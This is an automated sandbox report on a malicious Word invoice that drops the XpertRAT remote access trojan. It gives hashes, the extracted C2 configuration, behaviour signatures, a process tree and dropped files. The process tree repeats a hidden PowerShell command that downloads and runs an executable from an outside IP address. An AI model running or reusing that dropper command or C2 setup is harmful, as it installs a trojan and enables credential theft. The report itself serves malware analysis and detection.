Analysis

  • max time kernel
    28s
  • max time network
    314s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    06-09-2021 11:42

General

  • Target

    paymen_invoice.doc

  • Size

    340KB

  • MD5

    285d05dd2a3a053e5095f09b609fca64

  • SHA1

    668f3a6f6fa038bdbcd0e57d32783f37c259469d

  • SHA256

    e31f5bfd01e6d5876991d6aae68921b7510090d880d2602ed57032e7d14a9cae

  • SHA512

    1db0f843078059020981aba55b5fe40d72ec5cc1aa0903353bde23e28299cfd732435760f80e7423c7b999e64e810090bfbaa2f90609aa426cd79074c655c407

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

httP://192.3.194.242/EXCEL.exe

Extracted

Family

xpertrat

Version

3.0.10

Botnet

Test

C2

kapasky-antivirus.firewall-gateway.net:4000

Mutex

L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • XpertRAT

    XpertRAT is a remote access trojan with various capabilities.

  • XpertRAT Core Payload 3 IoCs
  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\paymen_invoice.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1840
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.242/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:664
      • C:\Users\Admin\AppData\Roaming\EXCEL.exe
        "C:\Users\Admin\AppData\Roaming\EXCEL.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1068
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName youtube.com
          4⤵
            PID:240
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
            4⤵
              PID:2072
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName facebook.com
              4⤵
                PID:2368
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName outlook.com
                4⤵
                  PID:2644
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName bing.com
                  4⤵
                    PID:2892
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                    4⤵
                      PID:2140
                    • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                      C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                      4⤵
                        PID:3016
                        • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                          5⤵
                            PID:2096
                            • C:\Windows\SysWOW64\notepad.exe
                              notepad.exe
                              6⤵
                                PID:2880
                              • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                /stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\aqetbcnbo0.txt"
                                6⤵
                                  PID:2548
                                • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                  /stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\aqetbcnbo1.txt"
                                  6⤵
                                    PID:2500
                                  • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                    /stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\aqetbcnbo1.txt"
                                    6⤵
                                      PID:1732
                                    • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                      /stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\aqetbcnbo2.txt"
                                      6⤵
                                        PID:1616
                                      • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        /stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\aqetbcnbo3.txt"
                                        6⤵
                                          PID:108
                                        • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                          /stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\aqetbcnbo4.txt"
                                          6⤵
                                            PID:2568
                                        • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                          C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                                          5⤵
                                            PID:1912
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.242/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
                                      2⤵
                                      • Process spawned unexpected child process
                                      • Blocklisted process makes network request
                                      • Loads dropped DLL
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      PID:1496
                                      • C:\Users\Admin\AppData\Roaming\EXCEL.exe
                                        "C:\Users\Admin\AppData\Roaming\EXCEL.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        PID:1600
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName youtube.com
                                          4⤵
                                            PID:2044
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                            4⤵
                                              PID:824
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName facebook.com
                                              4⤵
                                                PID:2356
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName outlook.com
                                                4⤵
                                                  PID:2632
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName bing.com
                                                  4⤵
                                                    PID:2916
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                                    4⤵
                                                      PID:2236
                                                    • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                                                      C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                                                      4⤵
                                                        PID:2968
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.242/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
                                                    2⤵
                                                    • Process spawned unexpected child process
                                                    • Loads dropped DLL
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1720
                                                    • C:\Users\Admin\AppData\Roaming\EXCEL.exe
                                                      "C:\Users\Admin\AppData\Roaming\EXCEL.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      PID:388
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName youtube.com
                                                        4⤵
                                                          PID:1016
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                                          4⤵
                                                            PID:1572
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName facebook.com
                                                            4⤵
                                                              PID:2340
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName outlook.com
                                                              4⤵
                                                                PID:2620
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName bing.com
                                                                4⤵
                                                                  PID:2932
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                                                  4⤵
                                                                    PID:2252
                                                                  • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                                                                    4⤵
                                                                      PID:2872
                                                                • C:\Windows\splwow64.exe
                                                                  C:\Windows\splwow64.exe 12288
                                                                  2⤵
                                                                    PID:2468
                                                                • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                                                                  1⤵
                                                                    PID:1848

                                                                  Network

                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                  Defense Evasion

                                                                  Modify Registry

                                                                  1
                                                                  T1112

                                                                  Discovery

                                                                  System Information Discovery

                                                                  1
                                                                  T1082

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_10a2719f-ab19-452c-9537-375fecbe5f96
                                                                    MD5

                                                                    df44874327d79bd75e4264cb8dc01811

                                                                    SHA1

                                                                    1396b06debed65ea93c24998d244edebd3c0209d

                                                                    SHA256

                                                                    55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

                                                                    SHA512

                                                                    95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1abda922-9e0e-4200-89d0-60796083afcc
                                                                    MD5

                                                                    be4d72095faf84233ac17b94744f7084

                                                                    SHA1

                                                                    cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

                                                                    SHA256

                                                                    b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

                                                                    SHA512

                                                                    43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_32b21970-4839-4ac5-a2ad-cc925aecc47c
                                                                    MD5

                                                                    a725bb9fafcf91f3c6b7861a2bde6db2

                                                                    SHA1

                                                                    8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

                                                                    SHA256

                                                                    51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

                                                                    SHA512

                                                                    1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_32b21970-4839-4ac5-a2ad-cc925aecc47c
                                                                    MD5

                                                                    a725bb9fafcf91f3c6b7861a2bde6db2

                                                                    SHA1

                                                                    8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

                                                                    SHA256

                                                                    51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

                                                                    SHA512

                                                                    1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_32b21970-4839-4ac5-a2ad-cc925aecc47c
                                                                    MD5

                                                                    a725bb9fafcf91f3c6b7861a2bde6db2

                                                                    SHA1

                                                                    8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

                                                                    SHA256

                                                                    51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

                                                                    SHA512

                                                                    1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_60554f64-a36e-4439-8748-76f202d7cb75
                                                                    MD5

                                                                    02ff38ac870de39782aeee04d7b48231

                                                                    SHA1

                                                                    0390d39fa216c9b0ecdb38238304e518fb2b5095

                                                                    SHA256

                                                                    fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

                                                                    SHA512

                                                                    24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ccb18ff-7a22-469e-90e7-ccc861e1432b
                                                                    MD5

                                                                    b6d38f250ccc9003dd70efd3b778117f

                                                                    SHA1

                                                                    d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

                                                                    SHA256

                                                                    4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

                                                                    SHA512

                                                                    67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7bc5ca8a-50eb-4a28-856a-31595e01418a
                                                                    MD5

                                                                    597009ea0430a463753e0f5b1d1a249e

                                                                    SHA1

                                                                    4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

                                                                    SHA256

                                                                    3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

                                                                    SHA512

                                                                    5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd47eb21-a96b-4ccd-99d7-0d9f3f6c10b6
                                                                    MD5

                                                                    75a8da7754349b38d64c87c938545b1b

                                                                    SHA1

                                                                    5c28c257d51f1c1587e29164cc03ea880c21b417

                                                                    SHA256

                                                                    bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

                                                                    SHA512

                                                                    798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c9b427a0-6073-4eb8-9b09-f8e4712d7ab5
                                                                    MD5

                                                                    5e3c7184a75d42dda1a83606a45001d8

                                                                    SHA1

                                                                    94ca15637721d88f30eb4b6220b805c5be0360ed

                                                                    SHA256

                                                                    8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

                                                                    SHA512

                                                                    fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                    MD5

                                                                    7382b162ddf0d15ded5e4decb68cebd7

                                                                    SHA1

                                                                    ff0b760047df6985a2ec5d83df8fc084a4a33cb4

                                                                    SHA256

                                                                    b4524317cdee7988f2d85d1bdbbd6180a379094516394c4d24316ccc0a815a15

                                                                    SHA512

                                                                    82a893ebf421f2ee02cb765d5a1cd205fc45c7bcb02c63ce6794951441fda1dc83207d0cdddb42e6aa1b03c396b36320ae4fbc415e3d881ef4db51c94f1ce772

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                    MD5

                                                                    768c35210b7e89d62841041f73367833

                                                                    SHA1

                                                                    552203e9975188052778e06eae19f0c1c52c5ad4

                                                                    SHA256

                                                                    edf35a38f3e2d70f0c26504a6a77b6f522cf8e9b3eb676766af46f475d588dd6

                                                                    SHA512

                                                                    3229d3be77f0734bde26527460fa04555a7ed02c2ee24622caab3476786edf4afb01ef0dfb681c313eaa13d5d17ab733494daf3c914dea9a91af318c0be7b867

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                    MD5

                                                                    21770027b29463a93ac0ccf9b462ec92

                                                                    SHA1

                                                                    8cac4d69c77a2549f0b06f431fcff882f7ff8d76

                                                                    SHA256

                                                                    e0d1cb9c07ea24ba55ce2a3f5b40837934101dbe13a53be1711fe50f56c1494a

                                                                    SHA512

                                                                    c96ea2579751ca59579b95fe902cf4aff72141d80e22c04edfa05cddb2f7b0329006a8a55ec4bceaff2f1c3c7a29057f707adbf2d8533d1aa51922ab0ec032b4

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                    MD5

                                                                    fa6b9db64eaae6b77edcc8418b4278e2

                                                                    SHA1

                                                                    90e5d13c779898d155d9bd386ceb0e02b081087a

                                                                    SHA256

                                                                    76ac632aeff482ecd4f3cb264ded8344ee53dc72239d3ea20504b5f9b2f06869

                                                                    SHA512

                                                                    70e1abfbf4bf6b8648da54b566c39f43a86f822f4f4da50ce82d6bfb621e324f87d1a961d1bfcb6e353835e29bfd7728440b6b44dc2d22910be08ca37f83e937

                                                                  • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                                                                    MD5

                                                                    eefa3dd3a36a5decba3c42072ef0798e

                                                                    SHA1

                                                                    a51f4f499fc618b9dc36e079258ed3c087e2bae5

                                                                    SHA256

                                                                    862bf290697cfbd5cb41966b550e8b163aac94d6e07461c6e4353ea6fad62e83

                                                                    SHA512

                                                                    6e28230749c2938279e32d4c2631ea6193f28c2a5d5cd38f4176dc8e5e70a986db866e770ff32e4eaad3233b8e336f66877e1e2c70c9ef5ec2f3912f9df7d6a2

                                                                  • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                                                                    MD5

                                                                    eefa3dd3a36a5decba3c42072ef0798e

                                                                    SHA1

                                                                    a51f4f499fc618b9dc36e079258ed3c087e2bae5

                                                                    SHA256

                                                                    862bf290697cfbd5cb41966b550e8b163aac94d6e07461c6e4353ea6fad62e83

                                                                    SHA512

                                                                    6e28230749c2938279e32d4c2631ea6193f28c2a5d5cd38f4176dc8e5e70a986db866e770ff32e4eaad3233b8e336f66877e1e2c70c9ef5ec2f3912f9df7d6a2

                                                                  • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                                                                    MD5

                                                                    eefa3dd3a36a5decba3c42072ef0798e

                                                                    SHA1

                                                                    a51f4f499fc618b9dc36e079258ed3c087e2bae5

                                                                    SHA256

                                                                    862bf290697cfbd5cb41966b550e8b163aac94d6e07461c6e4353ea6fad62e83

                                                                    SHA512

                                                                    6e28230749c2938279e32d4c2631ea6193f28c2a5d5cd38f4176dc8e5e70a986db866e770ff32e4eaad3233b8e336f66877e1e2c70c9ef5ec2f3912f9df7d6a2

                                                                  • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                                                                    MD5

                                                                    eefa3dd3a36a5decba3c42072ef0798e

                                                                    SHA1

                                                                    a51f4f499fc618b9dc36e079258ed3c087e2bae5

                                                                    SHA256

                                                                    862bf290697cfbd5cb41966b550e8b163aac94d6e07461c6e4353ea6fad62e83

                                                                    SHA512

                                                                    6e28230749c2938279e32d4c2631ea6193f28c2a5d5cd38f4176dc8e5e70a986db866e770ff32e4eaad3233b8e336f66877e1e2c70c9ef5ec2f3912f9df7d6a2

                                                                  • C:\Users\Admin\AppData\Roaming\EXCEL.exe
                                                                    MD5

                                                                    eefa3dd3a36a5decba3c42072ef0798e

                                                                    SHA1

                                                                    a51f4f499fc618b9dc36e079258ed3c087e2bae5

                                                                    SHA256

                                                                    862bf290697cfbd5cb41966b550e8b163aac94d6e07461c6e4353ea6fad62e83

                                                                    SHA512

                                                                    6e28230749c2938279e32d4c2631ea6193f28c2a5d5cd38f4176dc8e5e70a986db866e770ff32e4eaad3233b8e336f66877e1e2c70c9ef5ec2f3912f9df7d6a2

                                                                  • C:\Users\Admin\AppData\Roaming\EXCEL.exe
                                                                    MD5

                                                                    eefa3dd3a36a5decba3c42072ef0798e

                                                                    SHA1

                                                                    a51f4f499fc618b9dc36e079258ed3c087e2bae5

                                                                    SHA256

                                                                    862bf290697cfbd5cb41966b550e8b163aac94d6e07461c6e4353ea6fad62e83

                                                                    SHA512

                                                                    6e28230749c2938279e32d4c2631ea6193f28c2a5d5cd38f4176dc8e5e70a986db866e770ff32e4eaad3233b8e336f66877e1e2c70c9ef5ec2f3912f9df7d6a2

                                                                  • C:\Users\Admin\AppData\Roaming\EXCEL.exe
                                                                    MD5

                                                                    eefa3dd3a36a5decba3c42072ef0798e

                                                                    SHA1

                                                                    a51f4f499fc618b9dc36e079258ed3c087e2bae5

                                                                    SHA256

                                                                    862bf290697cfbd5cb41966b550e8b163aac94d6e07461c6e4353ea6fad62e83

                                                                    SHA512

                                                                    6e28230749c2938279e32d4c2631ea6193f28c2a5d5cd38f4176dc8e5e70a986db866e770ff32e4eaad3233b8e336f66877e1e2c70c9ef5ec2f3912f9df7d6a2

                                                                  • C:\Users\Admin\AppData\Roaming\EXCEL.exe
                                                                    MD5

                                                                    eefa3dd3a36a5decba3c42072ef0798e

                                                                    SHA1

                                                                    a51f4f499fc618b9dc36e079258ed3c087e2bae5

                                                                    SHA256

                                                                    862bf290697cfbd5cb41966b550e8b163aac94d6e07461c6e4353ea6fad62e83

                                                                    SHA512

                                                                    6e28230749c2938279e32d4c2631ea6193f28c2a5d5cd38f4176dc8e5e70a986db866e770ff32e4eaad3233b8e336f66877e1e2c70c9ef5ec2f3912f9df7d6a2

                                                                  • C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\aqetbcnbo2.txt
                                                                    MD5

                                                                    f3b25701fe362ec84616a93a45ce9998

                                                                    SHA1

                                                                    d62636d8caec13f04e28442a0a6fa1afeb024bbb

                                                                    SHA256

                                                                    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

                                                                    SHA512

                                                                    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

                                                                  • C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\aqetbcnbo4.txt
                                                                    MD5

                                                                    f3b25701fe362ec84616a93a45ce9998

                                                                    SHA1

                                                                    d62636d8caec13f04e28442a0a6fa1afeb024bbb

                                                                    SHA256

                                                                    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

                                                                    SHA512

                                                                    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

